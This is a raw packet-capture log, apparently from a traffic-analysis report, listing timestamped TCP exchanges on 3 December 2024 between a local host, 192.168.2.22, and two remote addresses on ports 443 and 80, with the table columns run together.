                                                                                                                                                                                  Dec 3, 2024 14:00:53.314553976 CET49165443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:53.314568043 CET4434916554.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:54.954140902 CET4434916554.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:54.954226971 CET49165443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:54.960511923 CET49165443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:54.960530043 CET4434916554.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:54.960937977 CET4434916554.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:54.960992098 CET49165443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:55.199042082 CET49165443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:55.243338108 CET4434916554.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:55.714740992 CET4434916554.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:55.714839935 CET4434916554.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:55.714951038 CET49165443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:55.714951038 CET49165443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:55.716027021 CET49165443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:55.716057062 CET4434916554.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:55.731483936 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:55.852876902 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:55.852968931 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:55.853151083 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:55.973150015 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.033308983 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.033385992 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.033411026 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.033437967 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.033629894 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.033643007 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.033668995 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.033684969 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.033981085 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.033993959 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.034006119 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.034018993 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.034034014 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.034863949 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.034924984 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.034929037 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.034940958 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.034985065 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.034985065 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.042300940 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.153378010 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.153445959 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.153548002 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.153594971 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.157567024 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.157627106 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.243369102 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.243443966 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.243479967 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.243551016 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.248032093 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.248080969 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.248107910 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.248121023 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.256716013 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.256784916 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.256870985 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.256907940 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.264723063 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.264806032 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.264847040 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.264926910 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.273122072 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.273169041 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.273240089 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.273272991 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.281805038 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.281872988 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.281929970 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.281965971 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.290163994 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.290271997 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.290319920 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.290359020 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.298662901 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.298712015 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.298747063 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.298779964 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.306281090 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.306320906 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.306386948 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.306418896 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.314505100 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.314558983 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.314719915 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.314753056 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.321611881 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.321669102 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.321722984 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.321759939 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.363738060 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.363821030 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.363825083 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.363856077 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.453038931 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.453072071 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.453788996 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.453844070 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.453886032 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.453918934 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.456300974 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.456346989 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.456412077 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.456446886 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.461669922 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.461744070 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.461798906 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.461838007 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.467113972 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.467185020 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.467204094 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.467240095 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.472079992 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.472142935 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.472191095 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.472225904 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.477303028 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.477370024 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.477400064 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.477442026 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.482661963 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.482723951 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.482845068 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.482881069 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.487855911 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.487916946 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.488010883 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.488048077 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.493020058 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.493073940 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.493180037 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.493216991 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.498290062 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.498358965 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.498389006 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.498425961 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.501919031 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.501977921 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.502022028 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.502060890 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.505891085 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.505959988 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.506028891 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.506063938 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.509243965 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.509315014 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.509430885 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.509474039 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.512989998 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.513053894 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.513149023 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.513187885 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.516613960 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.516661882 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.516735077 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.516769886 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.520276070 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.520354986 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.520406961 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.520450115 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.523874044 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.523941040 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:57.523976088 CET8049166142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:57.524013042 CET4916680192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:00:58.003259897 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:58.003299952 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:58.003357887 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:58.013649940 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:58.013662100 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:59.643336058 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:59.643434048 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:59.648492098 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:59.648505926 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:59.648859978 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:00:59.650238037 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:59.739412069 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:00:59.783338070 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:00.345050097 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:00.345129967 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:00.345139980 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:00.345176935 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:00.346448898 CET49167443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:00.346467018 CET4434916754.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:00.358762980 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:00.478981018 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:00.479095936 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:00.479321003 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:00.599334002 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.566916943 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.567075968 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.567148924 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.567162037 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.567249060 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.567646980 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.567682981 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568005085 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568017006 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568036079 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568048000 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568070889 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568070889 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568681002 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568696022 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568713903 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568715096 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568730116 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.568742037 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.572952032 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.687355042 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.687403917 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.687515020 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.758100033 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.758187056 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.758290052 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.762271881 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.762382984 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.762435913 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.770734072 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.770802975 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.770812035 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.770863056 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.779186010 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.779335976 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.779385090 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.787668943 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.787720919 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.787918091 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.787955999 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.796468019 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.796535969 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.796554089 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.796592951 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.804374933 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.804472923 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.804529905 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.812840939 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.812972069 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.813029051 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.821310043 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.821423054 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.821508884 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.830010891 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.830168962 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.830229998 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.837378979 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.837441921 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.837500095 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.950181961 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.950269938 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.950324059 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.953975916 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.954036951 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.954190016 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.954231977 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.961733103 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.961808920 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.961848021 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.969424009 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.969530106 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.969575882 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.974409103 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.974546909 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.974602938 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.979147911 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.979347944 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.979409933 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.983932018 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.984036922 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.984072924 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.988719940 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.988989115 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.989038944 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.993537903 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.993666887 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.993716002 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:01.998234034 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.998348951 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:01.998404026 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.003026009 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.003106117 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.003160954 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.007981062 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.008080959 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.008133888 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.012587070 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.012655973 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.012705088 CET4916880192.168.2.22142.93.65.161
